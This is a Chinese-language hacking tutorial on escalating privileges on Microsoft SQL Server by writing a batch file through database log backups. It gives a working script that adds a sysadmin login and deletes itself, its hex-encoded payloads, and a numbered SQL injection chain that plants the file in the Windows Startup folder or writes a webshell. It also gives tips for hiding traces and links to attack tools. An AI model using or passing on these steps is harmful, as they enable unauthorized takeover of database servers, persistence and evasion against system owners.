MSSQL备份提权注意点

-------------------------------------------------------------------------------------------------
一。工具:
小葵的转换工具.exe【必备
sqlinj dbbackup shell.exe
添加系统用户VBS加密脚本生成工具.exe

-------------------------------------------------------------------------------------------------
二。代码:(CMD下添加MSSQL SA权限用户 用户名:test1 密码:123
  1. @echo off
  2. @echo exec master.dbo.sp_addlogin test1,123> c:\1.qry
  3. @echo exec master.dbo.sp_addsrvrolemember test1,sysadmin>> c:\1.qry
  4. @cd %windir%
  5. @cmd.exe /c isql -E /U alma /P /i c:\1.qry
  6. @del %0
  7. @exit
  8. @
这里要注意小技巧:DA替换为0D0A    在转换时
用 小葵的转换工具.exe 转换如上代码,转换后如下:(代码1)
0x406563686F206F6666DA406563686F2065786563206D61737465722E64626F2E73705F6164646C6F67696E2074657374312C3132333E20633A5C312E717279DA406563686F2065786563206D61737465722E64626F2E73705F616464737276726F6C656D656D6265722074657374312C73797361646D696E3E3E20633A5C312E717279DA406364202577696E64697225DA40636D642E657865202F63206973716C202D45202F5520616C6D61202F50202F6920633A5C312E717279DA4064656C202530DA4065786974DA40DA
这样的代码备份出来的Bat文件是不能正常执行命令的。


经过查阅,我发现应该这样来修改才可以成功备份出可以执行命令的Bat文件:(代码2)
0x406563686F206F66660D0A406563686F2065786563206D61737465722E64626F2E73705F6164646C6F67696E2074657374312C3132333E20633A5C312E7172790D0A406563686F2065786563206D61737465722E64626F2E73705F616464737276726F6C656D656D6265722074657374312C73797361646D696E3E3E20633A5C312E7172790D0A406364202577696E646972250D0A40636D642E657865202F63206973716C202D45202F5520616C6D61202F50202F6920633A5C312E7172790D0A4064656C2025300D0A40657869740D0A400D0A


细心的你肯定会发现,两者差别是:
                 DA=0D0A
代码1 经过替换DA为0D0A之后 代码2
-------------------------------------------------------------------------------------------------
三。接着讲另外一个小技巧:


细心的你,又会发现,这两段代码有一些小区别:
代码4 多了一个标识符号
让我来告诉你,经过实践测试,在代码前加上,然后在备份可以避免文件头的错误。(TYPE)


-------------------------------------------------------------------------------------------------

综上所述,我们在写代码备份的时候,应该这样做,来提高代码执行的机率(90%):

1。在代码前加那个符号,在代码后加@再加一个回车符;
2。在转换代码为HEX编码时,应该注意 DA 与 0D0A ,后者才是对的;
3。写代码时要注意 清理痕迹 和 代码执行时隐蔽性 的问题。
清理痕迹,我们用del %0来执行吧。至于隐蔽性,Bat用@echo off,vbs在命令后加 ,0 可以隐藏。


-------------------------------------------------------------------------------------------------

四。最后附上我最终成功调试出的bat代码(全过程):

1。declare @a sysname;select @a=db_name();backup log @a with no_log;dbcc shrinkdatabase (@a)
【清除log日志,压缩数据库,降低备份出来的文件大小,提高成功率】

2。drop table cmd--
【删除cmd表,以免重复】

3。alter database [数据库名] set RECOVERY FULL--
【设置数据库为RECOVERY FULL模式,log备份的前奏】

4。create table cmd (a image)--
【建立cmd表,以备插入HEX值】

5。backup log [数据库名] to disk = 'c:\cmd' with init--
【备份数据库日志到'c:\cmd' 】

6。insert into cmd (a) values (要备份代码的HEX值,注意DA替换成0D0A)--
【向CMD表插入代码的HEX值】【提供一个完整的HEX值】

【0x130D0A0D0A406563686F206F66660D0A406563686F2065786563206D61737465722E64626F2E73705F6164646C6F67696E2074657374312C3132333E20633A5C312E7172790D0A406563686F2065786563206D61737465722E64626F2E73705F616464737276726F6C656D656D6265722074657374312C73797361646D696E3E3E20633A5C312E7172790D0A406364202577696E64697225200D0A40636D642E657865202F63206973716C202D45202F5520616C6D61202F50202F6920633A5C312E7172790D0A4064656C20633A5C312E71727920202020202020202020200D0A4064656C20253020202020202020202020200D0A406578697420202020202020202020200D0A4020200D0A0D0A】

7。backup log [数据库名] to disk = 'C:\Documents and Settings\All Users\「开始」菜单\程序\启动\start.bat'--
【备份数据库日志到‘启动’项,命名为:start.bat】
也可以是写入webshell
-------------------------------------------------------------------------------------------------

五。再有一个小技巧,如果第7步备份失败,可以利用第8步来代替之

8。declare @a sysname select @a=备份路径的SQL_EN值 backup log [数据库名] to disk=@a
【例如'C:\Documents and Settings\All Users\「开始」菜单\程序\启动\start.bat'为如下:】
【0x43003A005C0044006F00630075006D0065006E0074007300200061006E0064002000530065007400740069006E00670073005C0041006C006C002000550073006500720073005C00A1B800BFAA00CABC00A1B900B2CB00B5A5005C00B3CC00D0F2005C00C6F400B6AF005C00730074006100720074002E00620061007400】

以上所有代码的转换,请使用 小葵的转换工具.exe 来转换。

-------------------------------------------------------------------------------------------------

六。附上几个常有的工具:
小葵多功能转换工具.rar
http://pan.baidu.com/s/1dDj7zIp
备份到启动项等路径sqlinjdbbackupshell.rar
http://pan.baidu.com/s/1bnovkwZ
添加系统用户vbs加密脚本生成工具.rar
http://pan.baidu.com/s/1c09rS2G